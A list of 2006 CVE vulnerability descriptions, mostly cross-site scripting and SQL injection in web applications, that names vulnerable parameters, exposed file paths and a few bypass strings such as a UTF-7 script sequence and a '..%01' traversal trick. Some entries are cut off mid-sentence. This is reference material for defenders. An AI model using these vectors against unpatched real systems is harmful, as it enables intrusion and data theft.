[CVE-2006-3830] The Languages selection in the admin interface in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier allows remote authenticated administrators to upload files with arbitrary extensions to the bmc/Inc/Lang directory. NOTE: because the uploaded files cannot be accessed through HTTP, this issue is a vulnerability only if there is a likely usage pattern in which the files would be opened or executed by local users, e.g., malware files with names that entice local users to open the files.
[CVE-2006-3826] Multiple cross-site scripting (XSS) vulnerabilities in Kailash Nadh boastMachine (formerly bMachine) 3.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user_login, (2) full_name, and (3) URL parameters in register.php.
[CVE-2006-3821] Multiple cross-site scripting (XSS) vulnerabilities in ATutor 1.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) lang parameter in (a) index_list.php and (2) year, (3) month, and (4) day parameter in (b) registration.php.
[CVE-2006-3820] Cross-site scripting (XSS) vulnerability in loudblog/index.php in Loudblog before 0.5 allows remote attackers to inject arbitrary web script or HTML via the page parameter.
[CVE-2006-3818] Cross-site scripting (XSS) vulnerability in the login page in Novell GroupWise WebAccess 6.5 before 20060721 and WebAccess 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via the GWAP.version parameter.
[CVE-2006-3817] Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence.
[CVE-2006-3810] Cross-site scripting (XSS) vulnerability in Mozilla Firefox 1.5 before 1.5.0.5, Thunderbird before 1.5.0.5, and SeaMonkey before 1.0.3 allows remote attackers to inject arbitrary web script or HTML via the XPCNativeWrapper(window).Function construct.
[CVE-2006-3800] Cross-site scripting (XSS) vulnerability in Amazing Flash AFCommerce Shopping Cart allows remote attackers to inject arbitrary web script or HTML via the "new review" text box.
[CVE-2006-3795] Multiple cross-site scripting (XSS) vulnerabilities in DeluxeBB before 1.08 allow remote attackers to inject arbitrary web script or HTML via the (1) membercookie cookie in header.php and the (2) redirect parameter in misc.php.
[CVE-2006-3780] Keyifweb Keyif Portal 2.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database via a direct request for (1) ANKET/anket.mdb, (2) HABER/keyifweb.mdb, (3) ASP/download.mdb, or (4) SAYAC/aktif.mdb in the database/A9S7G6ASD790 directory.
[CVE-2006-3769] Multiple cross-site scripting (XSS) vulnerabilities in Top XL 1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) pass and (2) pass2 parameters in (a) add.php or the (3) id parameter in (b) members/index.php.
[CVE-2006-3767] Cross-site scripting (XSS) vulnerability in showprofile.php in Darren's $5 Script Archive osDate 1.1.7 and earlier allows remote attackers to inject arbitrary web script or HTML via the onerror attribute in an HTML IMG tag with a non-existent source file in txtcomment parameter, which is used when posting a comment.
[CVE-2006-3765] Multiple cross-site scripting (XSS) vulnerabilities in Huttenlocher Webdesign hwdeGUEST 2.1.1 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, as demonstrated by the "name input" field in new_entry.php.
[CVE-2006-3761] Cross-site scripting (XSS) vulnerability in inc/functions_post.php in MyBB (aka MyBulletinBoard) 1.0 RC2 through 1.1.4 allows remote attackers to inject arbitrary web script or HTML via a javascript URI with an SGML numeric character reference in the url BBCode tag, as demonstrated using "javas
[CVE-2006-3756] Cross-site scripting (XSS) vulnerability in Geeklog 1.4.0sr4 and earlier, and 1.3.11sr6 and earlier, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors when validating comments in (1) lib-comment.php (1.4.0sr4) or (2) comment.php (0.3.11sr6).
[CVE-2006-3737] Cross-site scripting (XSS) vulnerability in filemanager/filemanager.php in the control panel in SWsoft Plesk 8.0 and earlier allows remote authenticated users to inject arbitrary web script or HTML via the file parameter.
[CVE-2006-3734] Multiple unspecified vulnerabilities in the Command Line Interface (CLI) for Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allow local CS-MARS administrators to execute arbitrary commands as root.
[CVE-2006-3733] jmx-console/HtmlAdaptor in the jmx-console in the JBoss web application server, as shipped with Cisco Security Monitoring, Analysis and Response System (CS-MARS) before 4.2.1, allows remote attackers to gain privileges as the CS-MARS administrator and execute arbitrary Java code via an invokeOp action in the BSHDeployer jboss.scripts service name.
[CVE-2006-3730] Integer overflow in Microsoft Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via a 0x7fffffff argument to the setSlice method on a WebViewFolderIcon ActiveX object, which leads to an invalid memory copy.
[CVE-2006-3700] Multiple unspecified vulnerabilities in Oracle Database 9.2.0.6 and 10.1.0.4 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB04 for Web Distributed Authoring and Versioning (DAV) and (2) DB23 for XMLDB.
[CVE-2006-3681] Multiple cross-site scripting (XSS) vulnerabilities in awstats.pl in AWStats 6.5 build 1.857 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) refererpagesfilter, (2) refererpagesfilterex, (3) urlfilterex, (4) urlfilter, (5) hostfilter, or (6) hostfilterex parameters, a different set of vectors than CVE-2006-1945.
[CVE-2006-3680] Cross-site scripting (XSS) vulnerability in photocycle in Photocycle 1.0 allows remote attackers to inject arbitrary web script or HTML via the phpage parameter.
[CVE-2006-3661] Cross-site scripting (XSS) vulnerability in Index.PHP in CuteNews 1.4.5 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown
[CVE-2006-3640] Microsoft Internet Explorer 5.01 and 6 allows certain script to persist across navigations between pages, which allows remote attackers to obtain the window location of visited web pages in other domains or zones, aka "Window Location Information Disclosure Vulnerability."
[CVE-2006-3639] Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability."
[CVE-2006-3636] Multiple cross-site scripting (XSS) vulnerabilities in Mailman before 2.1.9rc1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-3624] Multiple cross-site scripting (XSS) vulnerabilities in FLV Players 8 allow remote attackers to inject arbitrary web script or HTML via the url parameter to (1) player.php or (2) popup.php.
[CVE-2006-3620] Cross-site scripting (XSS) vulnerability in the showtopic module in Koobi Pro CMS 5.6 allows remote attackers to inject arbitrary web script or HTML via the toid parameter.
[CVE-2006-3618] SQL injection vulnerability in pblguestbook.php in Pixelated By Lev (PBL) Guestbook 1.32 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) name, (2) email, (3) website, (4) comments, (5) rate, and (6) private parameters.
[CVE-2006-3617] Cross-site scripting (XSS) vulnerability in pblguestbook.php in Pixelated By Lev (PBL) Guestbook 1.32 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) name, (2) message (aka comments), (3) website, and (4) email parameters, which bypasses XSS protection mechanisms that check for SCRIPT tags but not others, as demonstrated by a javascript URI in an onMouseOver attribute and the src attribute in an iframe tag. NOTE: some vectors might overlap CVE-2006-2975, although the use of alternate manipulations makes it unclear.
[CVE-2006-3616] Multiple cross-site scripting (XSS) vulnerabilities in Carbonize Lazarus Guestbook 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the show parameter in codes-english.php and (2) the img parameter in picture.php, after the name of an existing file.
[CVE-2006-3613] Multiple cross-site scripting (XSS) vulnerabilities in Chamberland Technology ezWaiter 3.0 Online and possibly Enterprise Software (aka enterprise edition) allow remote attackers to inject arbitrary web script or HTML via the (1) itemfor (aka "Who is this item for?") and (2) special (aka "Special Instructions") parameters to item.php, which is accessed from showorder.php, or (3) unspecified parameters to the login form at login.php.
[CVE-2006-3612] Cross-site scripting (XSS) vulnerability in Phorum 5.1.14 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-3609] Cross-site scripting (XSS) vulnerability in index.php in Orbitcoders OrbitMATRIX 1.0 allows remote attackers to inject arbitrary web script or HTML via the page_name parameter with an IMG tag containing a javascript URI in the SRC attribute.
[CVE-2006-3607] Multiple cross-site scripting (XSS) vulnerabilities in Softbiz Banner Exchange Script (aka Banner Exchange Network Script) 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the city parameter in (a) insertmember.php, and (2) a PHPSESSID cookie in (b) lostpassword.php, (c) gen_confirm_mem.php, and (d) index.php.
[CVE-2006-3603] Cross-site scripting (XSS) vulnerability in index.php in FlexWATCH Network Camera 3.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL.
[CVE-2006-3601] ** UNVERIFIABLE ** Unspecified vulnerability in an unspecified DNN Modules module for DotNetNuke (.net nuke) allows remote attackers to gain privileges via unspecified vectors, as used in an attack against the Microsoft France web site. NOTE: due to the lack of details and uncertainty about which product is affected, this claim is not independently verifiable.
[CVE-2006-3595] The default configuration of IOS HTTP server in Cisco Router Web Setup (CRWS) before 3.3.0 build 31 does not require credentials, which allows remote attackers to access the server with arbitrary privilege levels, aka bug CSCsa78190.
[CVE-2006-3593] The command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to overwrite arbitrary files by redirecting a command's output to a file or folder, aka bug CSCse31704.
[CVE-2006-3592] Unspecified vulnerability in the command line interface (CLI) in Cisco Unified CallManager (CUCM) 5.0(1) through 5.0(3a) allows local users to execute arbitrary commands with elevated privileges via unspecified vectors, involving "certain CLI commands," aka bug CSCse11005.
[CVE-2006-3585] Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS 2.1 SR1 allow remote attackers to inject arbitrary web script or HTML via the (1) login parameter in admin/cms/index.php, (2) unspecified parameters in the "Supply news" page in formmail.php, (3) the URL in the "Site statistics" page, and the (5) query_string parameter when performing a search.
[CVE-2006-3583] Session fixation vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to hijack web sessions via a crafted link and the administrator section.
[CVE-2006-3579] Cross-site scripting (XSS) vulnerability in Fujitsu ServerView 2.50 up to 3.60L98 and 4.10L11 up to 4.11L81 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-3574] Multiple cross-site scripting (XSS) vulnerabilities in Hitachi Groupmax Collaboration Portal and Web Client before 07-20-/D, and uCosminexus Collaboration Portal and Forum/File Sharing before 06-20-/C, allow remote attackers to "execute malicious scripts" via unknown vectors (aka HS06-014-01).
[CVE-2006-3571] Multiple cross-site scripting (XSS) vulnerabilities in interna/hilfe.php in Papoo 3 RC3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) titel or (2) ausgabe parameters.
[CVE-2006-3570] Cross-site scripting (XSS) vulnerability in the webform module in Drupal 4.6 before July 8, 2006 and 4.7 before July 8, 2006 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.
[CVE-2006-3568] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.php in Fantastic Guestbook 2.0.1, and possibly earlier versions, allow remote attackers to inject arbitrary web script or HTML via the (1) first_name, (2) last_name, or (3) nickname parameters.
[CVE-2006-3564] Multiple cross-site scripting (XSS) vulnerabilities in HiveMail 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the email, (2) cond, or (3) name parameters to (a) addressbook.view.php, (4) the daysprune parameter to (b) index.php, (5) the data[to] parameter to (c) compose.email.php, and (6) the markas parameter to (d) read.markas.php.
[CVE-2006-3563] Cross-site scripting (XSS) vulnerability in gallery/thumb.php in Winged Gallery 1.0 allows remote attackers to inject arbitrary web script or HTML via the image parameter.
[CVE-2006-3558] Multiple cross-site scripting (XSS) vulnerabilities in Arif Supriyanto auraCMS 1.62 allow remote attackers to inject arbitrary web script or HTML via (1) the judul_artikel parameter in teman.php and (2) the title of an article sent to admin, which is displayed when unauthenticated users visit index.php.
[CVE-2006-3557] MT Orumcek Toplist 2.2 stores DB/orumcektoplist.mdb under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request.
[CVE-2006-3555] Multiple cross-site scripting (XSS) vulnerabilities in submit.php in PHP-Fusion before 6.01.3 allow remote attackers to inject arbitrary web script or HTML by using edit_profile.php to upload a (1) avatar or (2) forum image attachment that has a .gif or .jpg extension, and begins with a GIF header followed by JavaScript code, which is executed by Internet Explorer.
[CVE-2006-3550] Multiple cross-site scripting (XSS) vulnerabilities in F5 Networks FirePass 4100 5.x allow remote attackers to inject arbitrary web script or HTML via unspecified "writable form fields and hidden fields," including "authentication frontends."
[CVE-2006-3549] services/go.php in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 does not properly restrict its image proxy capability, which allows remote attackers to perform "Web tunneling" attacks and use the server as a proxy via (1) http, (2) https, and (3) ftp URL in the url parameter, which is requested from the server.
[CVE-2006-3548] Multiple cross-site scripting (XSS) vulnerabilities in Horde Application Framework 3.0.0 through 3.0.10 and 3.1.0 through 3.1.1 allow remote attackers to inject arbitrary web script or HTML via a (1) javascript URI or an external (2) http, (3) https, or (4) ftp URI in the url parameter in services/go.php (aka the dereferrer), (5) a javascript URI in the module parameter in services/help (aka the help viewer), and (6) the name parameter in services/problem.php (aka the problem reporting screen).
[CVE-2006-3545] ** DISPUTED ** Microsoft Internet Explorer 7.0 Beta allows remote attackers to cause a denial of service (application crash) via a web page with multiple empty APPLET start tags. NOTE: a third party has disputed this issue, stating that the crash does not occur with Microsoft Internet Explorer 7.0 Beta3.
[CVE-2006-3542] Multiple cross-site scripting (XSS) vulnerabilities in Garry Glendown Shopping Cart 0.9 allow remote attackers to inject arbitrary web script or HTML via the (1) shop name field in (a) editshop.php, (b) edititem.php, and (c) index.php
[CVE-2006-3539] Multiple cross-site scripting (XSS) vulnerabilities in DKScript.com Dragon's Kingdom Script 1.0 allow remote attackers to inject arbitrary web script or HTML via a javascript URI in the SRC attribute of an IMG element in the (1) Subject and (2) Message fields in a do=write (aka Send Mail Message) action in gamemail.php
[CVE-2006-3538] Multiple cross-site scripting (XSS) vulnerabilities in demo.php in BeatificFaith Eprayer Alpha allow remote attackers to inject arbitrary web script or HTML via the SRC attribute of a SCRIPT element in the (1) "Your name" field and (2) "Enter Prayer Request here" field.
[CVE-2006-3533] Multiple cross-site scripting (XSS) vulnerabilities in Pivot 1.30 RC2 and earlier, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) fg, (2) line1, (3) line2, (4) bg, (5) c1, (6) c2, (7) c3, and (8) c4 parameters in (a) includes/blogroll.php
[CVE-2006-3526] Multiple cross-site scripting (XSS) vulnerabilities in guestbook.php in Sport-slo Advanced Guestbook 1.0 allow remote attackers to inject arbitrary web script or HTML via (1) name and (2) form parameters.
[CVE-2006-3523] Clearswift MIMEsweeper for Web before 5.1.15 Hotfix allows remote attackers to cause a denial of service (crash) via an encrypted archived .RAR file, which triggers a scan error and causes the Web Policy Engine service to terminate.
[CVE-2006-3522] Cross-site scripting (XSS) vulnerability in Clearswift MIMEsweeper for Web before 5.1.15 Hotfix allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in an error message when trying to access a blocked web site.
[CVE-2006-3521] Multiple cross-site scripting (XSS) vulnerabilities in index/siteforge-bugs-action/proj.siteforge in SiteForge Collaborative Development Platform 1.0.4 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) _status, (2) _extra1, (3) _extra2, or (4) _extra3 parameters.
[CVE-2006-3519] Multiple cross-site scripting (XSS) vulnerabilities in The Banner Engine (tbe) 4.0 allow remote attackers to execute arbitrary web script or HTML via the (1) text parameter in a search action to (a) top.php, and the (2) adminpass or (3) adminlogin parameter to (b) signup.php.
[CVE-2006-3518] SQL injection vulnerability in SayfalaAltList.asp in Webvizyon Portal 2006 allows remote attackers to execute arbitrary SQL commands via the ID parameter.
[CVE-2006-3514] Multiple cross-site scripting (XSS) vulnerabilities in admin/actions.php in PHP-Blogger 2.2.5, and possibly earlier versions, allow remote attackers to execute arbitrary web script or HTML via the (1) name, (2) title, (3) news, (4) description, and (5) sitename parameters.
[CVE-2006-3505] WebKit in Apple Mac OS X 10.3.9 and 10.4.7 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted HTML document that causes WebKit to access an object that has already been deallocated.
[CVE-2006-3494] Multiple cross-site scripting (XSS) vulnerabilities in Buddy Zone 1.0.1 allow remote attackers to inject arbitrary HTML and web script via the (1) cat_id parameter to (a) view_classifieds.php
[CVE-2006-3487] VirtuaStore 2.0 stores sensitive files under the web root with insufficient access control, which allows remote attackers to obtain local database information by directly accessing database/virtuastore.mdb.
[CVE-2006-3484] Multiple cross-site scripting (XSS) vulnerabilities in ATutor before 1.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) show_courses or (2) current_cat parameters to (a) admin/create_course.php, show_courses parameter to (b) users/create_course.php, (3) p parameter to (c) documentation/admin/, (4) forgot parameter to (d) password_reminder.php, (5) cat parameter to (e) users/browse.php, or the (6) submit parameter to admin/fix_content.php.
[CVE-2006-3483] PHPMailList 1.8.0 stores sensitive information under the web document root with insufficient access control, which allows remote attackers to obtain email addresses of subscribers, configuration information, and the admin username and password via direct requests to (1) list.dat or (2) ml_config.dat.
[CVE-2006-3482] Cross-site scripting (XSS) vulnerability in maillist.php in PHPMailList 1.8.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the email parameter.
[CVE-2006-3481] Multiple SQL injection vulnerabilities in Joomla! before 1.0.10 allow remote attackers to execute arbitrary SQL commands via unspecified parameters involving the (1) "Remember Me" function, (2) "Related Items" module, and the (3) "Weblinks submission".
[CVE-2006-3480] Multiple cross-site scripting (XSS) vulnerabilities in Joomla! before 1.0.10 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters involving the (1) getUserStateFromRequest function, and the (2) SEF and (3) com_messages modules.
[CVE-2006-3476] Cross-site scripting (XSS) vulnerability in comments.php in PhpWebGallery 1.5.2 and earlier, and possibly 1.6.0, allows remote attackers to inject arbitrary web script or HTML via the keyword parameter.
[CVE-2006-3456] The Symantec NAVOPTS.DLL ActiveX control (aka Symantec.Norton.AntiVirus.NAVOptions) 12.2.0.13, as used in Norton AntiVirus, Internet Security, and System Works 2005 and 2006, is designed for use only in application-embedded web browsers, which allows remote attackers to "crash the control" via unspecified vectors related to content on a web site, and place Internet Explorer into a "defunct state" in which remote attackers can execute arbitrary code in addition to other Symantec ActiveX controls, regardless of whether they are marked safe for scripting. NOTE: this CVE was inadvertently used for an E-mail Auto-Protect issue, but that issue has been assigned CVE-2007-3771.
[CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true".
[CVE-2006-3429] Cross-site scripting (XSS) vulnerability in TigerTom TTCalc 1.0 allows remote attackers to inject arbitrary web script or HTML via the currency parameter in (1) loan.php and (2) mortgage.php. NOTE: the provenance of this information is unknown
[CVE-2006-3428] Cross-site scripting (XSS) vulnerability in TigerTom TTCalc 1.0 allows remote attackers to inject arbitrary web script or HTML via the year parameter in (1) loan.php and (2) mortgage.php.
[CVE-2006-3424] Multiple buffer overflows in WebEx Downloader ActiveX Control, possibly in versions before November 2005, allow remote attackers to execute arbitrary code via unspecified vectors.
[CVE-2006-3423] WebEx Downloader ActiveX Control and WebEx Downloader Java before 2.1.0.0 do not validate downloaded components, which allows remote attackers to execute arbitrary code via a website that activates the GpcUrlRoot and GpcIniFileName ActiveX controls to cause the client to download a DLL file.
[CVE-2006-3405] Cross-site scripting (XSS) vulnerability in qtofm.php in QTOFileManager 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) delete, (2) pathext, and (3) edit parameters.
[CVE-2006-3397] Multiple cross-site scripting (XSS) vulnerabilities in Taskjitsu before 2.0.1 allow remote attackers to inject arbitrary web script or HTML via multiple unspecified parameters, including the (1) title and (2) description parameters when creating a task.
[CVE-2006-3392] Webmin before 1.290 and Usermin before 1.220 calls the simplify_path function before decoding HTML, which allows remote attackers to read arbitrary files, as demonstrated using "..%01" sequences, which bypass the removal of "../" sequences before bytes such as "%01" are removed from the filename. NOTE: This is a different issue than CVE-2006-3274.
[CVE-2006-3388] Cross-site scripting (XSS) vulnerability in phpMyAdmin before 2.8.2 allows remote attackers to inject arbitrary web script or HTML via the table parameter.
[CVE-2006-3385] Cross-site scripting (XSS) vulnerability in divers.php in Vincent Leclercq News 5.2 allows remote attackers to inject arbitrary web script or HTML via the (1) id and (2) disabled parameters.
[CVE-2006-3383] Cross-site scripting (XSS) vulnerability in index.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via Javascript events such as onmouseover within a URL. NOTE: the provenance of this information is unknown
[CVE-2006-3382] Cross-site scripting (XSS) vulnerability in search.php in mAds 1.0 allows remote attackers to inject arbitrary web script or HTML via the "search string".
[CVE-2006-3377] Cross-site scripting (XSS) vulnerability in JMB Software AutoRank PHP 3.02 and earlier, and AutoRank Pro 5.01 and earlier, allows remote attackers to inject arbitrary web script or HTML via the (1) Keyword parameter in search.php and the (2) Username parameter in main.cgi.
[CVE-2006-3371] Eupla Foros 1.0 stores the inc/config.inc file under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration.
[CVE-2006-3370] Blueboy 1.0.3 stores bb_news_config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration.
[CVE-2006-3369] Kamikaze-QSCM 0.1 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration.
[CVE-2006-3368] Efone 20000723 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information.
[CVE-2006-3367] Mp3 JudeBox Server (Mp3NetBox) Beta 1 stores config.inc under the web document root with insufficient access control, which allows remote attackers to obtain sensitive information, including the database configuration.
[CVE-2006-3366] Multiple cross-site scripting (XSS) vulnerabilities in V3 Chat allow remote attackers to inject arbitrary web script or HTML via crafted HTML tags, as demonstrated by the IMG tag, in the (1) id parameter in (a) mail/index.php and (b) mail/reply.php
[CVE-2006-3362] Unrestricted file upload vulnerability in connectors/php/connector.php in FCKeditor mcpuk file manager, as used in (1) Geeklog 1.4.0 through 1.4.0sr3, (2) toendaCMS 1.0.0 Shizouka Stable and earlier, (3) WeBid 0.5.4, and possibly other products, when installed on Apache with mod_mime, allows remote attackers to upload and execute arbitrary PHP code via a filename with a .php extension and a trailing extension that is allowed, such as .zip.
[CVE-2006-3359] Multiple SQL injection vulnerabilities in index.php in NewsPHP 2006 PRO allow remote attackers to inject arbitrary web script or HTML via the (1) words, (2) id, (3) topmenuitem, and (4) cat_id parameters in (a) index.php
[CVE-2006-3358] Multiple cross-site scripting (XSS) vulnerabilities in index.php in NewsPHP 2006 PRO allow remote attackers to inject arbitrary web script or HTML via the (1) words, (2) id, (3) cat_id, and (4) tim parameters, which are not sanitized before being returned in an error page. NOTE: it is possible that some of these vectors are resultant from an SQL injection issue.
[CVE-2006-3353] Opera 9 allows remote attackers to cause a denial of service (crash) via a crafted web page that triggers an out-of-bounds memory access, related to an iframe and JavaScript that accesses certain style sheets properties.
[CVE-2006-3345] Cross-site scripting (XSS) vulnerability in AliPAGER, possibly 1.5 and earlier, allows remote attackers to inject arbitrary web script or HTML via a chat line.
[CVE-2006-3342] Cross-site scripting (XSS) vulnerability in index.php in Arctic 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the query parameter in a search cmd.
[CVE-2006-3338] Cross-site scripting (XSS) vulnerability in Atlassian JIRA 3.6.2-#156 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in a direct request to secure/ConfigureReleaseNote.jspa, which are not sanitized before being returned in an error page.
[CVE-2006-3337] Cross-site scripting (XSS) vulnerability in frontend/x/files/select.html in cPanel 10.8.2-CURRENT 118 and earlier allows remote attackers to inject arbitrary web script or HTML via the file parameter.
[CVE-2006-3333] Cross-site scripting (XSS) vulnerability in index.php in Zorum Forum 3.5 allows remote attackers to inject web script or HTML via the multiple unspecified parameters, including the (1) frommethod, (2) list, and (3) method, which are reflected in an error message. NOTE: some of these vectors might be resultant from SQL injection.
[CVE-2006-3331] Opera before 9.0 does not reset the SSL security bar after displaying a download dialog from an SSL-enabled website, which allows remote attackers to spoof a trusted SSL certificate from an untrusted website and facilitates phishing attacks.
[CVE-2006-3327] Cross-site scripting (XSS) vulnerability in Custom dating biz dating script 1.0 allows remote attackers to inject arbitrary web script or HTML via the (1) sn20_special_cases parameter ("Special Cases" field) in profile/mini.php, (2) tyxx01_album_name parameter ("Album Name" field) in profile/photo_create.php, and the (3) u parameter in admin/user_view.php.
[CVE-2006-3321] Multiple cross-site scripting (XSS) vulnerabilities in openforum.asp in OpenForum 1.2 Beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) ofdisp and (2) ofmsgid parameters.
[CVE-2006-3320] Cross-site scripting (XSS) vulnerability in command.php in SiteBar 3.3.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the command parameter.
[CVE-2006-3319] Cross-site scripting (XSS) vulnerability in rss/index.php in PHP iCalendar 2.22 and earlier allows remote attackers to inject arbitrary web script or HTML via the cal parameter.
[CVE-2006-3313] Cross-site scripting (XSS) vulnerability in search.jsp in Netsoft smartNet 2.0 allows remote attackers to inject arbitrary web script or HTML via the keyWord parameter.
[CVE-2006-3312] Multiple cross-site scripting (XSS) vulnerabilities in ashmans and Bill Echlin QaTraq 6.5 RC and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) link_print, (2) link_upgrade, (3) link_sql, (4) link_next, (5) link_prev, and (6) link_list parameters in top.inc as included by queries_view_search.php
[CVE-2006-3306] Cross-site scripting (XSS) vulnerability in the preparestring function in lib/common.php in Project EROS bbsengine before 20060501-0142-jam, and possibly earlier versions dating back to 2006-02-23, might allow remote attackers to inject arbitrary web script or HTML via unknown vectors.
[CVE-2006-3305] Multiple cross-site scripting (XSS) vulnerabilities in UebiMiau Webmail 2.7.10, and 2.7.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) f_user parameter in index.php, the (2) pag parameter in messages.php, or the (3) lid, (4) tid, and (5) sid parameters in error.php.
[CVE-2006-3303] Multiple cross-site scripting (XSS) vulnerabilities in pm.php in DeluxeBB 1.07 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) subject or (2) to parameters.
[CVE-2006-3301] Multiple cross-site scripting (XSS) vulnerabilities in phpQLAdmin 2.2.7 and earlier allow remote attackers to inject arbitrary web script or HTML via the domain parameter in (1) user_add.php or (2) unit_add.php.
[CVE-2006-3299] Cross-site scripting (XSS) vulnerability in index.php in Usenet Script 0.5 allows remote attackers to inject arbitrary web script or HTML via the group parameter.
[CVE-2006-3297] Cross-site scripting (XSS) vulnerability in error.php in UebiMiau Webmail 2.7.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the icq parameter. NOTE: the provenance of this information is unknown
[CVE-2006-3295] Cross-site scripting (XSS) vulnerability in header.php in Open Guestbook 0.5 allows remote attackers to inject arbitrary web script or HTML via the title parameter.
[CVE-2006-3290] HTTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames and directory paths via a direct URL request.
[CVE-2006-3284] Cross-site scripting (XSS) vulnerability in Dating Agent PRO 4.7.1 allows remote attackers to inject arbitrary web script or HTML via the login parameter in (1) webmaster/index.php and (2) search.php.
[CVE-2006-3279] Cross-site scripting (XSS) vulnerability in aeDating 4.1 allows remote attackers to inject arbitrary web script or HTML via the (1) Sex parameter in index.php, (2) ProfileType parameter in join_form.php, and (3) Email parameter in forgot.php.
[CVE-2006-3278] Cross-site scripting (XSS) vulnerability in H-Sphere 2.5.1 Beta 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) next_template, (2) start, (3) curr_menu_id, and (4) arid parameters in psoft/servlet/resadmin/psoft.hsphere.CP when using the mailman/massmail.html template_name.
[CVE-2006-3274] Directory traversal vulnerability in Webmin before 1.280, when run on Windows, allows remote attackers to read arbitrary files via \ (backslash) characters in the URL to certain directories under the web root, such as the image directory.
[CVE-2006-3273] Cross-site scripting (XSS) vulnerability in menu.php in Some Chess 1.5 rc1 allows remote attackers to inject arbitrary web script or HTML via the user parameter ("New Name" field).
[CVE-2006-3265] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Qdig before 1.2.9.3, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) pre_gallery or (2) post_gallery parameters.
[CVE-2006-3264] Cross-site scripting (XSS) vulnerability in mclient.cgi in Namo DeepSearch 4.5 allows remote attackers to inject arbitrary web script or HTML via the p parameter.
[CVE-2006-3263] SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the catid parameter.
[CVE-2006-3262] SQL injection vulnerability in the Weblinks module (weblinks.php) in Mambo 4.6rc1 and earlier allows remote attackers to execute arbitrary SQL commands via the title parameter.
[CVE-2006-3261] Cross-site scripting (XSS) vulnerability in Trend Micro Control Manager (TMCM) 3.5 allows remote attackers to inject arbitrary web script or HTML via the username field on the login page, which is not properly sanitized before being displayed in the error log.
[CVE-2006-3260] Cross-site scripting (XSS) vulnerability in index.php in vlbook 1.02 allows remote attackers to inject arbitrary web script or HTML via the message parameter.
[CVE-2006-3259] Multiple cross-site scripting (XSS) vulnerabilities in e107 0.7.5 allow remote attackers to inject arbitrary web script or HTML via the (1) ep parameter to search.php and the (2) subject parameter in comment.php (aka the Subject field when posting a comment).
[CVE-2006-3258] Multiple cross-site scripting (XSS) vulnerabilities in index.html in BNBT TrinEdit and EasyTracker 7.7r3.2004.10.27 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) filter or (2) sort parameters.
